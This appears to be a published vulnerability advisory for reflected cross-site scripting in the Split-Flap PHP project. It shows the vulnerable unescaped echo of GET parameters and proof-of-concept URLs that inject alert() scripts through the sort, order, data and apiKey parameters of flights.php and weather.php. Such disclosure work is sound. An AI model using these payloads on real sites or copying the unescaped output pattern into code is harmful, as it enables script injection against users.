Split-Flap Cross Site Scripting

2016.06.14
Credit: HaHwul
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php) # Exploit Title: Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php) # Date: 2016-06-10 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/baspete/Split-Flap , http://pete.basdesign.com/ # Software Link: https://github.com/baspete/Split-Flap/archive/master.zip # Version: none(releases) # Tested on: Debian [wheezy] # CVE : none ### Vulnerability Details ##################################################### # The echo function in a and b are vulnerable. # # <!-- parameters --> # <input type="hidden" name="data" value="<?php echo $_GET["data"] ?>" /> # <input type="hidden" name="sort" value="<?php echo $_GET["sort"] ?>" /> # <input type="hidden" name="order" value="<?php echo $_GET["order"] ?>" /> ############################################################################### ### XSS1 - flights.php Attack Code http://127.0.0.1/vul_test/Split-Flap/flights.php?data=departures&sort=scheduled"><script>alert(45)</script>&order=as weak parameters - order - sort - data ### XSS2 - weather.php Attack Code http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey="%2Balert(45)%2B"a http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey=</script><script>alert(45)</script> weak parameters - apikey - data ### Vulnerability Details #####################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top